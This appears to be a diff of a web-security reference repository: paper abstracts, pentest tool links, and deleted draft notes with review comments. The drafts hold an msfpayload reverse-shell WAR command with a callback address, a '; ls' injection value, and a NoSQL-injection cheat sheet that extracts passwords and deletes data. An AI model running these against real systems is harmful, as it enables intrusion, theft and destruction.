* We present the first micro-architectural side-channel at- tack which runs entirely in the browser. In contrast to other works in this genre, this attack does not require the attacker to install any software on the victim’s machine – to facilitate the attack, the victim needs only to browse to an untrusted webpage with attacker-controlled con- tent. This makes the attack model highly scalable and ex- tremely relevant and practical to today’s web, especially since most desktop browsers currently accessing the In- ternet are vulnerable to this attack. Our attack, which is an extension of the last-level cache attacks of Yarom et al. [23], allows a remote adversary recover information belonging to other processes, other users and even other virtual machines running on the same physical host as the victim web browser. We describe the fundamentals behind our attack, evaluate its performance using a high bandwidth covert channel and finally use it to construct a system-wide mouse/network activity logger. Defending against this attack is possible, but the required counter- measures can exact an impractical cost on other benign uses of the web browser and of the computer.
[Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control](http://ericchen.me/self_exfiltration.pdf)
* Abstract —Since the early days of Netscape, browser vendors and web security researchers have restricted out-going data based on its destination. The security argument accompanying these mechanisms is that they prevent sensitive user data from being sent to the attacker’s domain. However, in this paper, we show that regulating web information flow based on its destination server is an inherently flawed security practice. It is vulnerable to self-exfiltration attacks, where an adversary stashes stolen information in the database of a whitelisted site, then later independently connects to the whitelisted site to retrieve the information. We describe eight existing browser security mechanisms that are vulnerable to these “self-exfiltration” attacks. Furthermore, we discovered at least one exfiltration channel for each of the Alexa top 100 websites. None of the existing information flow control mechanisms we surveyed are sufficient to protect data from being leaked to the attacker. Our goal is to prevent browser vendors and researchers from falling into this trap by designing more systems that are vulnerable to self-exfiltration.
[The Devil is in the Constants: Bypassing Defenses in Browser JIT Engines](http://users.ics.forth.gr/~elathan/papers/ndss15.pdf)
* Abstract —Return-oriented programming (ROP) has become the dominant form of vulnerability exploitation in both user and kernel space. Many defenses against ROP exploits exist, which can significantly raise the bar against attackers. Although protecting existing code, such as applications and the kernel, might be possible, taking countermeasures against dynamic code, i.e., code that is generated only at run-time, is much harder. Attackers have already started exploiting Just-in-Time (JIT) engines, available in all modern browsers, to introduce their (shell)code (either native code or re-usable gadgets) during JIT compilation, and then taking advantage of it. Recognizing this immediate threat, browser vendors started employing defenses for hardening their JIT engines. In this paper, we show that—no matter the employed defenses—JIT engines are still exploitable using solely dynamically generated gadgets. We demonstrate that dynamic ROP payload construction is possible in two modern web browsers without using any of the available gadgets contained in the browser binary or linked libraries. First, we exploit an open source JIT engine (Mozilla Firefox) by feeding it malicious JavaScript, which once processed generates all re- quired gadgets for running any shellcode successfully. Second, we exploit a proprietary JIT engine, the one in the 64-bit Microsoft Internet Explorer, which employs many undocumented, specially crafted defenses against JIT exploitation. We manage to bypass all of them and create the required gadgets for running any shellcode successfully. All defensive techniques are documented in this paper to assist other researchers. Furthermore, besides showing how to construct ROP gadgets on-the-fly, we also show how to discover them on-the-fly, rendering current randomization schemes ineffective. 
Finally, we perform an analysis of the most important defense currently employed, namely constant blinding , which shields all three-byte or larger immediate values in the JIT buffer for hindering the construction of ROP gadgets. Our analysis suggests that extending constant blinding to all immediate values (i.e., shielding 1-byte and 2-byte constants) dramatically decreases the JIT engine’s performance, introducing up to 80% additional instructions.
[Cookieless Monster: Exploring the Ecosystem of Web-based Device Fingerprinting](http://securitee.org/files/cookieless_sp2013.pdf)
* Abstract —The web has become an essential part of our society and is currently the main medium of information delivery. Billions of users browse the web on a daily basis, and there are single websites that have reached over one billion user accounts. In this environment, the ability to track users and their online habits can be very lucrative for advertising companies, yet very intrusive for the privacy of users. In this paper, we examine how web-based device fingerprint- ing currently works on the Internet. By analyzing the code of three popular browser-fingerprinting code providers, we reveal the techniques that allow websites to track users without the need of client-side identifiers. Among these techniques, we show how current commercial fingerprinting approaches use questionable practices, such as the circumvention of HTTP proxies to discover a user’s real IP address and the installation of intrusive browser plugins. At the same time, we show how fragile the browser ecosystem is against fingerprinting through the use of novel browser- identifying techniques. With so many different vendors involved in browser development, we demonstrate how one can use diversions in the browsers’ implementation to distinguish successfully not only the browser-family, but also specific major and minor versions. Browser extensions that help users spoof the user-agent of their browsers are also evaluated. We show that current commercial approaches can bypass the extensions, and, in addition, take advantage of their shortcomings by using them as additional fingerprinting features.
[SSL/TLS Interception Proxies and Transitive Trust](http://media.blackhat.com/bh-eu-12/Jarmoc/bh-eu-12-Jarmoc-SSL_TLS_Interception-WP.pdf)
* Secure Sockets Layer (SSL) [ 1 ] and its successor Transport Layer Security (TLS) [ 2 ] have become key components of the modern Internet . The privacy, integrity, and authenticity [ 3 ] [ 4 ] provided by these protocols are critical to allowing sensitive communications to occur . Without these systems, e - commerce, online banking , and business - to - business exchange of information would likely be far less frequent. Threat actors have also recognized the benefits of transport security, and they are increasingly turning to SSL to hide their activities . Advanced Persistent Threat ( APT ) attackers [ 5 ] , botnets [ 6 ] , and eve n commodity web attacks can leverage SSL encryption to evade detection. To counter these tactics, organizations are increasingly deploying security controls that intercept end - to - end encrypted channels. Web proxies, data loss prevention ( DLP ) systems, spec ialized threat detection solutions, and network intrusion prevention systems ( N IPS ) offer functionality to intercept, inspect , and filter encrypted traffic. Similar functionality is present in lawful intercept systems and solutions enabling the broad surve illance of encrypted communications by governments. Broadly classified as “SSL/TLS interception proxies ,” these solutions act as a “ man in the middle , ” violating the end - to - end security promises of SSL. This type of interception comes at a cost . Intercepti ng SSL - encrypted connections sacrifices a degree of privacy and integrity for the benefit of content inspection, often at the risk of authenticity and endpoint validation . Implementers and designers of SSL interception proxies should consider these risks and understand how their systems operate in unusual circumstances
###Miscellaneous
[unindexed](https://github.com/mroth/unindexed/blob/master/README.md)
* The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site, these contributions will also be destroyed when the site deletes itself.
[COWL: A Confinement System for the Web](http://cowl.ws/)
* Robust JavaScript confinement system for modern web browsers. COWL introduces label-based mandatory access control to browsing contexts (pages, iframes, etc.) in a way that is fully backward-compatible with legacy web content.
[Paper](http://www.scs.stanford.edu/~deian/pubs/stefan:2014:protecting.pdf)
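Review bot: the HTML 5 / SH5ARK block is added here a second time (it already appears under `###HTML 5` earlier in the file, just before `###LFI & RFI`), and `Secondary channel extraction` is listed twice in a row at the top of the hunk; remove both duplicates. `Impidence mismatch` in the hunk context should read `Impedance mismatch`. The pasted abstracts under `###Papers` carry PDF extraction residue: hyphenated line breaks such as `at- tack`, `con- tent`, `counter- measures`, `fingerprint- ing`, `re- quired`, spaces inside words throughout the SSL/TLS interception paragraph (`Intercepti ng`, `spec ialized`, `N IPS`, `surve illance`, `eve n`, `e - commerce`), and `[23]`, which is a citation into that paper's own bibliography and means nothing here. Since these are quoted abstracts, either clean the artefacts or cut each to its first sentence or two. Under COWL, `[Paper](...)` sits at top level while every other sub-link in the file is a `*` bullet under its entry; make it one.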

+ 0
- 36
Draft/Draft/Web Applications/Add.txt View File

@ -1,36 +0,0 @@
Add content for:
BlindElephant
Sparty
https://github.com/alias1/sparty
Audit Frontpage/Sharepoint sites
Droopescan
https://github.com/droope/droopescan
A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.
CMS-Explorer
XSS attack examples/ideas
Github dorks - finding vulns
http://blog.conviso.com.br/2013/06/github-hacking-for-fun-and-sensitive.html
http://www.html5rocks.com/en/tutorials/security/content-security-policy/
Arachni Web Scanner
http://www.arachni-scanner.com/
Prompt.ml - XSS challenges
Intro to content Security Policy
www.html5rocks.com/en/tutorials/security/content-security-policy/
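Review bot: this deletes the Add.txt to-do list, but none of its items (BlindElephant, Sparty, Droopescan, CMS-Explorer, the GitHub-dorks post, Arachni, Prompt.ml, the html5rocks CSP introduction) appear in the additions to Web Applications.md visible in this diff; confirm they were carried over before the file is dropped, or keep the file until they are. The CSP link was listed twice in the deleted file, once with and once without the scheme, so only one copy needs to migrate.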

+ 0
- 79
Draft/Draft/Web Applications/Cull integrate.txt View File

@ -1,79 +0,0 @@
[Go Buster](https://github.com/OJ/gobuster)
* Directory/file busting tool written in Go
* Recursive, CLI-based, no java runtime
[DOM Clobbering Attack](http://www.thespanner.co.uk/2013/05/16/dom-clobbering/)
[Postcards from a Post-XSS World - Michael Zalewski](http://lcamtuf.coredump.cx/postxss/#dangling-markup-injection)
[Postcards from a Post-XSS World - Michael Zalewski](http://lcamtuf.coredump.cx/postxss/#dangling-markup-injection)
* This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks.
[Relative Path Overwrite Explanation/Writeup](http://www.thespanner.co.uk/2014/03/21/rpo/)
* RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.
[lan-js](https://github.com/jvennix-r7/lan-js)
* Probe LAN devices from a web browser.
http
[MozillaRecovery](https://github.com/gtfy/MozillaRecovery)
* Recovers the master password of key3.db files, i.e. Thunderbird, Firefox
[Javascript De-Obfuscation Tools Redux](http://www.kahusecurity.com/2014/javascript-deobfuscation-tools-redux/)
* Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention.
Intro to Content Security Policy
http://www.html5rocks.com/en/tutorials/security/content-security-policy/
Securing Web Application Technologies Checklist
http://www.securingthehuman.org/developer/swat
Client Identification Mechanisms
http://www.chromium.org/Home/chromium-security/client-identification-mechanisms
RAWR - Rapid Assessment of Web Resources
https://bitbucket.org/al14s/rawr/wiki/Home
COWL: A Confinement System for the Web
robust JavaScript confinement system for modern web browsers. COWL introduces label-based mandatory access control to browsing contexts (pages, iframes, etc.) in a way that is fully backward-compatible with legacy web content.
http://cowl.ws/
http://www.scs.stanford.edu/~deian/pubs/stefan:2014:protecting.pdf
List of modules in Co2: https://code.google.com/p/burp-co2/wiki/Co2Modules
Help page: http://co2.professionallyevil.com/help.php
A collection of enhancements for Portswigger's popuplar Burp Suite web penetration testing tool.
https://code.google.com/p/burp-co2/
Co2 includes several useful enhancements bundled into a single Java-based Burp Extension. The extension has it's own configuration tab with multiple sub-tabs (for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
OWASP Mantra
http://www.getmantra.com/hackery/
“OWASP Mantra is a powerful set of tools to make the attacker's task easier”
Bradamsa
https://github.com/ikkisoft/bradamsa
Burp Suite extension to generate Intruder payloads using Radamsa
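Review bot: of the entries in the deleted Cull integrate.txt, only the RPO write-up and COWL reappear in the visible additions to Web Applications.md; the rest (Go Buster, DOM Clobbering, Postcards from a Post-XSS World, lan-js, MozillaRecovery, the JavaScript de-obfuscation post, the SWAT checklist, Chromium client identification mechanisms, RAWR, Burp Co2, OWASP Mantra, Bradamsa) do not, so either this is a larger cull than "cleanup/re-arrangement" suggests or they were moved to a file outside this diff; the commit message should say which. The file was clearly mid-edit (`Postcards from a Post-XSS World` listed twice, a stray `http` line), so a quick pass over what is worth keeping is cheap to do now.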

+ 0
- 36
Draft/Draft/Web Applications/Databases.txt View File

@ -1,36 +0,0 @@
##Databases
###NoSQL
NoSQL
[MongoDB: Typical Security Weaknesses in a NoSQL DB](http://blog.spiderlabs.com/2013/03/mongodb-security-weaknesses-in-a-typical-nosql-database.html)
Cheat sheet
NoSQL-injection Cheat Sheet
? db.getName() – Get current DB name
? db.members.count() – Get number of documents in the collection
? db.members.validate({ full : true}) – Get ALL information about this
collection
? db.members.stats() – Get information about this collection
? db.members.remove() – remove all documents from current collection
? db.members.find().skip(0).limit(1) – Get documents from DB (Change only
number in skip() function)
? db.getMongo().getDBNames().toString() – Get the list of all DBs
? db.members.find()[0][‘pass’] – Get “pass” value from current collection]
Firstov Mikhail
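Review bot: deleting Databases.txt drops the NoSQL-injection cheat sheet (the Mongo shell one-liners credited to Firstov Mikhail) entirely; the SpiderLabs MongoDB link survives in the `##(NO)SQL Injection` section above but the cheat sheet does not, so either migrate it with the attribution or state in the commit message that it was intentionally cut. If it is migrated, the `?` prefixes are mangled bullet glyphs, `db.members.validate({ full : true}) – Get ALL information about this` / `collection` is one item split over two lines, and the whole list belongs in a code block rather than loose text.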

+ 0
- 22
Draft/Draft/Web Applications/General Tips Trick.txt View File

@ -1,22 +0,0 @@
Fix up
Generating payload for Tomcat
msfpayload java/shell/reverse_tcp LHOST=192.168.1.6 W > colesec.war
Tomcat does not have default creds however, when packaged up, it generally has creds similar across distributions.
Use auxiliary/scanner/http/tomcat_mgr_login
http://kaoticcreations.blogspot.com/2012/11/hacking-cold-fusion-servers-part-i.html
Code Injection:
https://www.owasp.org/index.php/Code_Injection
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:
allowed characters (standard regular expressions classes or custom)
data format
amount of expected data
Code Injection differs from Command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.
; ls
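Review bot: General Tips Trick.txt is removed whole, including the Code Injection definition and the Tomcat manager notes, and nothing in the visible additions picks them up; if that is deliberate, say so in the commit message. Should the Tomcat notes be re-added later: `msfpayload` was retired from Metasploit in 2015 in favour of `msfvenom`, the `LHOST=192.168.1.6` value and the `colesec.war` filename are from the original author's lab and should become placeholders, and the sentence about Tomcat credentials contradicts itself ("does not have default creds however ... generally has creds similar across distributions") and needs rewording. The Code Injection paragraph is copied from the linked OWASP page and should be quoted as such, and the trailing `; ls` fragment has no context and should be dropped or folded into the command-injection sentence it illustrates.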

+ 0
- 30
Draft/Draft/Web Applications/Securing Web Applications.txt View File

@ -1,30 +0,0 @@
Securing Web Applications